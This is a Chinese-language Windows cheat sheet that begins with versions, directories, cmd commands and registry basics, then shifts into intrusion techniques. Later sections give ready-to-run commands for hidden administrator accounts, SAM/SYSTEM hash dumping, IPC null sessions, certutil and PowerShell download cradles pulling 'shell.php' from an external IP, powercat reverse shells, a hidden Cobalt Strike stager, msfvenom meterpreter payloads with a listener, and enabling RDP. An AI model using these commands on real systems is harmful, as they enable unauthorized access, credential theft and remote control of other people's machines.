Windows基礎

版本號	發佈時間
WindowsNT3.1	1993
WindowsNT4.0	1996.4
Windows 2000 (NT5.0)	2000
Windows XP (NT5.1)	2001.10 2009.4中止更新
Window Vista (NT6.0)	2007.1 2011.7中止更新 2017年4月中止全部支持
Windows 7 (NT6.1)	2009.7 2020.1中止全部支持
Windows 8 (NT6.3)	2012.10
Windows 8.1	2013.10
Windows 10 (NT10.0)	2015.7

Windows Server

版本號	發佈時間
Windows Server 2003	2003.3 2015.7中止更新
Windows Server 2008	2008.2
Windows Server 2012	2012.9
Windows Server 2016	2016.10

Windows中常見的目錄

C:\Users\xie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup    這個目錄下存放着這個用戶開機啓動的程序
C:\programData\Microsoft\Winodws\Start Menu\Programs\StartUp    這個目錄下存放這開機自啓的程序
C:\Windows                                 這個目錄是系統的安裝目錄
C:\Windows\System32                        這個目錄下存放着系統的配置文件
C:\Windows\System32\config\SAM             這個目錄下的SAM文件存放着用戶的登陸帳戶和密碼，要清楚帳戶和密碼，須要進PE系統把這個文件刪掉，對應系統進程： lsass.exe
C:\PerfLogs                                這個是系統日誌目錄

Windows常見的cmd命令

#系統信息
systeminfo                           查看系統信息
hostname                             查看主機名
SET                                  查看環境變量
color                                改變cmd顏色
cls                                  清除屏幕

#網絡
ping -t  -l  65500  ip               死亡之ping
ipconfig    /release                 釋放ip
ipconfig    /renew                   從新得到ip
ipconfig    /flushdns                刷新DNS緩存
route print                          打印路由信息
arp -a                               查看arp緩存
net view                             查看局域網內其餘計算機名稱
netsh firewall show state            防火牆狀態
netsh firewall show config           防火牆規則


#用戶
whoami                                查看系統當前用戶
net user                              查看有哪些用戶
net user xie                          查看用戶xie的信息
net localgroup                        查看組
net localgroup administrators         查看組administrators的信息
net user  hack   123  /add            新建一個用戶hack，密碼爲123
net user  hack$  123  /add            新建一個隱藏hack用戶，密碼爲123
net user  hack   /del                 刪除用戶hack
net localgroup  administrators  hack  /add   將普通用戶hack提權到管理員
net user  guest  /active:yes          激活guest用戶
net user  guest  /active:no           關閉guest用戶
net password   密碼                   更改系統當前登陸用戶密碼
net user guest 密碼                   更改guest用戶密碼


#端口進程服務
tasklist                             查看進程
tasklist  /svc                       查看進程，顯示進程使用者名稱
netstat  -ano                        查看系統開放端口
netstat  -ano|findstr 80             查看80端口對應的PID
tasklist | findstr 80                查看80端口對應的進程
taskkill /f /t /im xx.exe            殺死xx.exe進程
taskkill /F -pid 520                 殺死pid爲520的進程
net start                            查看開啓了哪些服務
net start telnet                     開啓telnet服務
net stop  telnet                     中止 telnet服務
start   www.baidu.com                打開網址

#共享
net use                               查看鏈接
net share                             查看本地開啓的共享
net share ipc$                        開啓ipc$共享
net share ipc$ /del                   刪除ipc$共享
net share c$ /del                     刪除C盤共享

net use \\192.168.10.15\ipc$ /u:"" ""     與192.168.10.15創建ipc空鏈接
net use \\192.168.10.15      /u:"" ""     與192.168.10.15創建ipc空鏈接，能夠吧ipc$去掉
net use \\192.168.10.15 /u:"administrator" "root"   以administrator身份與192.168.10.15創建ipc鏈接
net use \\192.168.10.15 /del              刪除ipc鏈接

net use \\192.168.10.15\c$  /u:"administrator" "root"    創建C盤共享
dir \\192.168.10.15\c$                  查看192.168.10.15C盤文件
dir \\192.168.10.15\c$\user             查看192.168.10.15C盤文件下的user目錄
dir \\192.168.10.15\c$\user\test.exe    查看192.168.10.15C盤文件下的user目錄下的test.exe文件
net use \\192.168.10.15\c$  /del        刪除該C盤共享鏈接

net use k: \\192.168.10.15\c$  /u:"administrator" "root"    將目標C盤映射到本地K盤
net use k: /del                                             刪除該映射
   
#文件操做 
echo  hello,word > 1.txt              向1.txt中寫入 hello,word
echo  hello,word >>1.txt              向1.txt中追加 hello,word
del                                   刪除一個文件
deltree                               刪除文件夾和它下面的全部子文件夾還有文件
ren 1.txt  2.txt                      將 1.txt 重命名爲 2.txt
type  1.txt                           查看1.txt文件的內容
md                                    建立一個文件夾
rd                                    刪除一個文件夾
move  1.txt  d:/                      將1.txt文件移動到d盤下
type  123.txt                         打開123.txt文件
dir c:\                               查看C盤下的文件
dir c:\ /A                            查看C盤下的全部文件，包括隱藏文件
dir c:\ /S                            查看C盤下和其子文件夾下的文件
dir c:\ /B                            只顯示C盤下的文件名

shutdown -s -t 60 -c  「你的電腦被黑了」         -s關機 -r重啓 -a取消
copy con A.txt   建立A.txt文本文件; 
  hello,word　　　　　 輸入內容; 
　　　 按CTRL+Z鍵，以後再回車；


 
reg save  hklm\sam  sam.hive
reg save  hklm\system  system.hive
這兩個文件是windows的用戶帳戶數據庫，全部用戶的登陸名以及口令等相關信息都會保存在文件中，這兩條命令是獲取windows管理員的hash值

Windows中cmd窗口的文件下載(bitsadmin和certutil)

不管是bitsadmin仍是certutil，都要將下載的文件放到擁有權限的目錄，不然會提示權限拒絕

certutil

certutil也是windows下一款下載文件的工具，自從WindowsServer 2003就自帶。可是在Server 2003使用會有問題。也就是說，一下命令是在Win7及其之後的機器使用。

certutil -urlcache -split -f http://114.118.80.138/shell.php  #下載文件到當前目錄下

certutil -urlcache -split -f http://114.118.80.138/shell.php  c:/users/xie/desktop/shell.php        #下載文件到指定目錄下

bitsadmin

bitsadmin 能夠用來在windows 命令行下下載文件。bitsadmin是windows 後臺智能傳輸服務的一個工具，windows 的自動更新，補丁之類的下載就是用這個工具來實現的。Windows Server2003和XP是沒有bitsadmin的，Winc7及其以後的機器纔有。

bitsadmin的一些特性：

bitsadmin 能夠在網絡不穩定的狀態下下載文件，出錯會自動重試，可靠性應該至關不錯。
bitsadmin 能夠跟隨URL跳轉.
bitsadmin 不像curl wget 這類工具那樣能用來下載HTML頁面。

用法：

bitsadmin /transfer test http://files.cnblogs.com/files/gayhub/bcn.js  c:\users\xie\desktop\shell.php
# "任務名" 能夠隨意起，保存文件的文件路徑必須是已經存在的目錄，不然不能下載。

下載完成後

默認狀況下bitsadmin下載速度極慢，下載較大文件須要設置優先級提速，如下是用法示例

start bitsadmin /transfer test http://192.168.10.14/test.exe  f:\test.exe
bitsadmin /setpriority test foreground     #設置任務test爲最高優先級

Windows中的Powershell命令

Windows PowerShell 是一種命令行外殼程序和腳本環境，使命令行用戶和腳本編寫者能夠利用 .NET Framework的強大功能。

Windows XP 和 Windows Server 2003是沒有Powershell的，Win七、2008 Server 及其之後的有。

#在cmd窗口下執行，將遠程主機上的test.exe 下載到本地的桌面上
powershell "$c=new-Object \"System.Net.WebClient\";$c.DownloadFile(\"http://192.168.10.11/test.exe\",\"C:/Users/Administrator/Desktop/test.exe\");";

Windows中的批處理文件

@echo off            表示在此語句後全部運行的命令都不顯示命令行自己
echo                 顯示這行後面的文字
title                標題 
rem                  註釋命令
cls                  清楚窗口
set /a               賦值
set /p  name=        接受用戶輸入,保存在name中
%name%               輸出用戶的輸入
if   else            判斷
GEQ                  大於等於
LSS                  小於
goto   :1 :2         跳轉到
exit                 退出程序
start                啓動文件
call                 調用另外一個批處理文件
dir c:\*.*>a.txt     將C盤文件列表寫入a.txt
del                  刪除一個或多個文件

Windows中快捷鍵操做

Alt+Tab               快速切換程序
Alt+F4                快速關閉程序
Alt                   矩形選擇
Alt+雙擊文件           查看文件屬性
Shift+delete          永久刪除文件
Ctrl+。               中英文標點切換
Ctrl+S                保存
Ctrl+N                新建
Ctrl+W                關閉程序
Ctrl+U                加下劃線
Ctrl+Z                撤銷操做
Ctrl+B                粗體
Ctrl+I                斜體
Ctrl+shift+esc        快速打開任務管理器
Win+D                 快速回到桌面
Win+I                 快速打開設置
Win+A                 打開操做中心
Win+Q                 打開語音助手cortana
Win+X                 打開windows功能
Win+Pause             個人電腦的屬性

Windows中運行窗口的命令

dxdiag                查詢電腦硬件配置信息
control               控制面板
services.msc          服務
msconfig              系統配置
regedit               註冊表
ncpa.cpl              網絡鏈接
firewall.cpl          防火牆
devmgmt.msc           設備管理器 
diskmgmt.msc          磁盤管理實用
compmgmt.msc          計算機管理
winver                檢查Windows版本  
write                 寫字板
mspaint               畫圖板
mstsc                 遠程桌面鏈接 
magnify               放大鏡實用程序 
notepad               打開記事本
shrpubw               建立共享文件夾 
calc                  啓動計算器 
osk                   打開屏幕鍵盤

Windows中的註冊表

註冊表（Registry，繁體中文版Windows稱之爲登陸）是Microsoft Windows中的一個重要的數據庫，用於存儲系統和應用程序的配置信息

HKEY_CLASSES_ROOT 管理文件系統，根據windows中安裝的應用程序的擴展名，該根鍵指明其文件類型的名稱，相應打開文件所要調用的程序等等信息。
HEKY_CURRENT_USER 管理系統當前的用戶信息。在這個根鍵中保存了本地計算機存放的當前登陸的用戶信息，包括用戶登陸用戶名和暫存的密碼。
HKEY_LOCAL_MACHINE 管理當前系統硬件配置。在這個根鍵中保存了本地計算機硬件配置數據，此根鍵下的子關鍵字包括在SYSTEM.DAT中，用來提供HKEY_LOCAL_MACHINE所需的信息，或者在遠程計算機中可訪問的一組鍵中
HKEY_USERS 管理系統的用戶信息，在這個根鍵中保存了存放在本地計算機口令列表中的用戶標識和密碼列表。同時每一個用戶的預配置信息都存儲在HKEY_USERS根鍵中。HKEY_USERS是遠程計算機中訪問的根鍵之一。
HKEY_CURRENT_CONFIG 管理當前用戶的系統配置。在這個根鍵中保存着定義當前用戶桌面配置的數據，該用戶使用過的文檔列表。

Windows中的端口

公認端口：公認端口也稱爲經常使用端口，包括 0-1023 端口
註冊端口：註冊端口包括 1024-49151 端口，它們鬆散地綁定一些服務
動態/私有端口：動態/私有端口包括 49152-65535，這些端口一般不會被分配服務。

關閉端口：

命令行方式關閉端口，其實是調用了防火牆。以管理員權限打開cmd窗口，執行下面命令，如下是演示關閉139端口

netsh advfirewall set allprofile state on
netsh advfirewall firewall add rule name=test dir=in action=block protocol=TCP localport=139   #想關閉其餘端口，把139替換成其餘端口就行

也能夠直接在防火牆圖形化界面關閉：

而後一直下一步就能夠了

Windows中的進程

windows中包括系統進程和程序進程。

ctrl+shift+esc 打開任務管理器，能夠查看進程信息。用戶名爲SYSTEM的是系統進程。

一些常見的系統進程和含義：

conime.exe：與輸入法編輯器有關的系統進程，可以確保正常調整和編輯系統中的輸入法
csrss.exe：該進程是微軟客戶端/服務端運行時子系統，該進行管理windows圖形相關任務
ctfmon.exe：該進程與輸入法有關，該進程的正常運行可以確保語言欄能正常顯示在任務欄中
explorer.exe：該進程是windows資源管理器，能夠說是windows圖形界面外殼程序，該進程的正常運行可以確保在桌面上顯示桌面圖標和任務欄
lsass.exe：該進行用於windows操做系統的安全機制、本地安全和登陸策略
services.exe：該進程用於啓動和中止系統中的服務，若是用戶手動終止該進程，系統也會從新啓動該進程
smss.exe：該進程用於調用對話管理子系統，負責用戶與操做系統的對話
svchost.exe：該進行是從動態連接庫(DLL)中運行的服務的通用主機進程名稱，若是用戶手動終止該進程，系統也會從新啓動該進程
system：該進程是windows頁面內存管理進程，它可以確保系統的正常啓動
system idle process：該進行的功能是在CPU空閒時發出一個命令，使CPU掛起，從而有效下降CPU內核的溫度
winlogon.exe：該進程是Windows NT用戶登陸程序，主要用於管理用戶登陸和退出。

監聽端口netstat

windows中使用 netstat 命令用來監聽端口

顯示全部的有效鏈接信息列表，包括監聽鏈接請求（LISTENING ）的鏈接、已創建的鏈接（ESTABLISHED ）、斷開鏈接（CLOSE_WAIT ）或者處於聯機等待狀態的（TIME_WAIT ）等：netstat -a
以數字形式顯示地址和端口號：netstst -an
除了顯示這些信息外，還顯示進程的PID：netstat -ano
查看被佔用端口80對應的應用的PID：netstat -ano | findstr 80
查看80端口被哪一個進程或程序佔用：tasklist | findstr 80
結束該進程或程序：taskkill /f /t /im xx.exe /f 殺死全部進程及 /t 強制殺死 /im 用鏡像名稱做爲進程信息
殺死指定PID的進程：taskkill -F -pid 520 殺死PID爲520的進程

Windows反彈Shell

cmd窗口下利用Powershell反彈NC shell

親測全部機器都適用

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11 -p 8888 -e cmd

powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.10.11  -p 8888 -e cmd.exe"

cmd窗口下利用Powershell反彈CobaltStrike shell

windows10 常常性不能用。windows 2008R2如下百分百適用。

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))"   #後臺運行
 
powershell.exe  -c "IEX ((new-object net.webclient).downloadstring('http://114.118.80.138:8080/a'))"

cmd窗口下反彈MSF shell

VPS上的操做

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=114.128.90.138 lport=7788 -f psh-reflection >7788.ps1        #生成木馬文件 7788.ps1

python -m SimpleHTTPServer 80  #開啓web服務

#MSF監聽
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 114.118.80.138
set lport 7788
exploit -j

目標機的操做

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1');xx.ps1"  #後臺運行

或者

powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://114.118.80.138/7788.ps1');xx.ps1"

一鍵開啓3389遠程桌面

如下命令須要administrator權限運行，XP / 2003 / Win7 / Win2008 R2 Server 親測可用

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

C:\Windows\System32\wbem\wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1